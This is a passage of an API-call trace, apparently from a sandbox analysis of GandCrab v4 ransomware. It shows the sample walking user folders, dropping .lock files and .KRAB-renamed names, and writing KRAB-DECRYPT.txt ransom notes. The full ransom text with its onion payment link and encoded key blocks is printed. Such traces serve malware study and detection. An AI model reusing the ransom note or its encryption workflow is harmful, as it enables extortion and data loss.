wJ1cbi0dC0ZupdUMXdEyil5EVrOYjd7OcK256OyLJexaPYNoLMT7nNQFQdBAdgxrP1A2j17iR9Rncy0lG27vyzvnlxBJHtN4rzwPyJcWjijdp+tPdfwpkuUhL1s780j4MPPa6ZSqrbN1dVzXyLYpgTfUJlmuliMYsyPoNF0wncUp6xOYOyeuFYcAYzh6kio0hS/OQfq9DULy4jlRsz4upLH/t6I4C2/8Dhtc9am+2z9kXRqxFGT2X4svMmQoZzcM7WuEljG+iZFnGvqeC8n5vHYUfpc5fDXIAr/3POwA8reJF9MuTQQ1Y71BT3fv8E7sTer0XVOuLq5R4mK7sEM2n3/s8Xg1stfLsHdFcp4Hmv7zJXtlAL+R4H9W/nSZPojs1+CA3f3LfcV0a7HpDCnE+3xAWSnFQ2gRJqfwbzuEDyyCVnlyuJ3gtkbgNzq9B1APP/reqFbD0NTG+Qbvjfy1WKWsuD6289ARnmzQdZfMJBKc6RFzabP8o+FTdQ528K5/LT7x00/WeKSnwRm9OwlEw+VgWABWgavtON3e6mnQGl0Ht3WD/SoiTiUQhaoEEUIhq2bMJGacz0QBGGZmiesqKc5BNYY47mlOBt90VgLBU4CrLlcekD1QKjwWIv7VZ/6d9hWbB8r/E0K0I3RLvsz5vWO2nXOYF4tjdvIFwTL7vhZLqD68CF4elxti9nkRp6gejjvBin0GKFE4sn+7ygICF6nm51nbjx2PCS9UqKQVB18bAq1wqNncQG3eriEdZiQnDmTTBJwZ6wxpzlzgiHPxH2MQl59eCy06ZlQ4pRy8AIZxYSs8MjywVkVMf5xfLKSSVC62MPhaeUAB6K7uhE53Kh/oFl2ty6x3FceOAGIk+6qZNV46mVnA0GY1UlOP7S+iVlY0LkPprvD5AwUQwkDA3J2EcOBy5zS0VDHF/IytPJedv/7il5EehJa3AjJJxYGvWERQaYZIUHY/zL8TGo2R8/ZR5MxJqHNldb8Qd8e6doJuxjxiJYrhGVvyhtJA622V6kMSz5u9Zt2BKOap2t+iec6qvzJ66awl54zVCYGCWnYUJ0Gr+HJQiCb+f9SsuUKy0pCXHEtL7hiZI7EOOMD7fkCREB/rydvt9VVgNLaxwvILFzP8c8FdqundPbfSwa3uorXdvHPZwzmxgXTCDqSdOEPl1K4/SIPmI5XHa0B26K6PumAdOtmc=\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0055.369] WriteFile (in: hFile=0x368, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f4a0, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f4a0*=0x1f6e, lpOverlapped=0x0) returned 1 [0055.371] CloseHandle (hObject=0x368) returned 1 [0055.371] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.371] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.371] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2, wMilliseconds=0x241)) [0055.372] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.372] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.372] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.372] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a08d2ca4dee3d.lock") returned 45 [0055.372] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x368 [0055.372] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.373] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.373] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\") returned 22 [0055.373] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\*" [0055.373] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\*", lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 0xfbe0e0 [0055.373] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.373] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0055.373] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.373] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.373] FindNextFileW (in: hFindFile=0xfbe0e0, lpFindFileData=0x338f4d0 | out: lpFindFileData=0x338f4d0) returned 1 [0055.373] lstrcmpW (lpString1="AppData", lpString2=".") returned 1 [0055.373] lstrcmpW (lpString1="AppData", lpString2="..") returned 1 [0055.373] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\", lpString2="AppData" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData" [0055.373] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\" [0055.373] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.374] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.374] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.374] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.374] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.374] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.374] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.374] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\\\KRAB-DECRYPT.txt") returned 47 [0055.374] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0055.375] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the extension: .KRAB \r\r\nThe only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files.\r\n\r\r\nThe server with your key is in a closed network TOR. You can get there by the following ways:\r\n\r\n----------------------------------------------------------------------------------------\r\r\n| 0. Download Tor browser - https://www.torproject.org/ \r\r\n| 1. Install Tor browser \r\n| 2. Open Tor Browser \r\n| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/dce1bb8bd2ca4def \r\n| 4. Follow the instructions on this page \r\r\n---------------------------------------------------------------------------------------- \r\n \r\r\nOn our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. \r\r\n\r\nATTENTION!\r\r\nIN ORDER TO PREVENT DATA DAMAGE:\r\n\r\n* DO NOT MODIFY ENCRYPTED FILES\r\n* DO NOT CHANGE DATA BELOW\r\n\r\n---BEGIN GANDCRAB KEY---\r\n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\r\n---END GANDCRAB KEY---\r\n\r\n---BEGIN PC DATA---\r\nwfKD6iudumBkmpL8IRr4U4WxPFasOVPtwzxuOrz15VYnvLCWAh5YYedd8JZ0TohRkHY+7lVWgLeoTG2H6B5UBLbzu9M274X6G0GXDCriMpJ288/FKv/amF6obpAeLpej5fxw2X3xAZKuipuhf0T/Aq8AmLZ0OOqX4bnabVckN3QybYaW5sCbYapYDKSRxsQpKY4m29eAXVK1ZEZVsQONuUHcKCJJ2P+MK0OxMKkPxYoALGmTApxSmtAoT3Z6P6Q/GfqS1pdzxDbVjd1AG3hpl55nRN0JCAMxfQ7GDJ0r+X0/Si/FGQ/ukeotJdiuqcCnrbrH57Rit7F/kRzBs+Lx/2c2Q+t0GtNYPlrXBiXt/hGHEd0b9SdH4o+4Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFtwNYoDRPKnK0+De5cAL2fimEyg6RrIA32xA9Kxw7zZibpCBFJ3vTLMeag1wIZNXQARgyKKDnc1lDgdH8NmV7f2yy3QRtn8rJ3lpuw5nIKVY/pfTfifFIcKcAhPzVN238JQy/C1qZGEv3tLUi+BdhMPpGxHsMOI7+QRdQP94kvV//uurM=\r\n---END PC DATA---") returned 4023 [0055.375] WriteFile (in: hFile=0x320, lpBuffer=0x2f20000*, nNumberOfBytesToWrite=0x1f6e, lpNumberOfBytesWritten=0x338f220, lpOverlapped=0x0 | out: lpBuffer=0x2f20000*, lpNumberOfBytesWritten=0x338f220*=0x1f6e, lpOverlapped=0x0) returned 1 [0055.376] CloseHandle (hObject=0x320) returned 1 [0055.376] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.376] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.376] GetSystemTime (in: lpSystemTime=0x3030400 | out: lpSystemTime=0x3030400*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0xd, wMinute=0x2d, wSecond=0x2, wMilliseconds=0x241)) [0055.376] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.377] GetWindowsDirectoryW (in: lpBuffer=0x3040000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0055.377] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x3040200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x3040600, lpMaximumComponentLength=0x3040608, lpFileSystemFlags=0x3040604, lpFileSystemNameBuffer=0x3040400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x3040600*=0xd2ca4def, lpMaximumComponentLength=0x3040608*=0xff, lpFileSystemFlags=0x3040604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0055.377] wsprintfW (in: param_1=0x3030000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a08d2ca4dee3d.lock") returned 53 [0055.377] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a08d2ca4dee3d.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\d2ca4a08d2ca4dee3d.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x320 [0055.382] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.382] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.382] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\") returned 30 [0055.383] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\*" [0055.383] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\*", lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 0xfbd2a0 [0055.383] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0055.383] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0055.383] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0055.383] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0055.383] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0055.383] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0055.383] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0055.383] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a08d2ca4dee3d.lock" [0055.383] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.383] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 58 [0055.383] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\d2ca4a08d2ca4dee3d.lock") returned 53 [0055.383] lstrlenW (lpString=".lock") returned 5 [0055.383] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.384] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".lock ") returned 6 [0055.384] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.384] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.384] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0055.384] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0055.384] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0055.384] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\KRAB-DECRYPT.txt" [0055.384] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.384] wsprintfW (in: param_1=0x3030000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\KRAB-DECRYPT.txt.KRAB") returned 51 [0055.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\KRAB-DECRYPT.txt") returned 46 [0055.385] lstrlenW (lpString=".txt") returned 4 [0055.385] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x3040000 [0055.385] wsprintfW (in: param_1=0x3040000, param_2="%s " | out: param_1=".txt ") returned 5 [0055.385] VirtualFree (lpAddress=0x3040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\KRAB-DECRYPT.txt") returned 46 [0055.385] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\KRAB-DECRYPT.txt") returned 46 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0055.385] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0055.385] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.386] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0055.386] lstrcmpW (lpString1="Local", lpString2=".") returned 1 [0055.386] lstrcmpW (lpString1="Local", lpString2="..") returned 1 [0055.386] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="Local" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local" [0055.386] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\" [0055.386] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.386] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.386] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.387] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0055.387] lstrcmpW (lpString1="LocalLow", lpString2=".") returned 1 [0055.387] lstrcmpW (lpString1="LocalLow", lpString2="..") returned 1 [0055.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="LocalLow" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow" [0055.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\LocalLow\\" [0055.387] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.387] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.387] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.387] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.387] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.387] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.387] FindNextFileW (in: hFindFile=0xfbd2a0, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0055.387] lstrcmpW (lpString1="Roaming", lpString2=".") returned 1 [0055.387] lstrcmpW (lpString1="Roaming", lpString2="..") returned 1 [0055.387] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\", lpString2="Roaming" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming" [0055.388] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\" [0055.388] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0055.388] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0055.388] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0055.388] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0055.388] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x3030000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0055.388] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0055.388] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x3030000 [0055.388] wsprintfW (in: param_1=0x3030200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\\\KRAB-DECRYPT.txt") returned 55 [0055.388] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x434 [0055.389] lstrlenW (lpString="---= GANDCRAB V4 =--- \r\r\n\r\r\nAttention! \r\r\nAll your files, documents, photos, databases and other important files are encrypted and have the 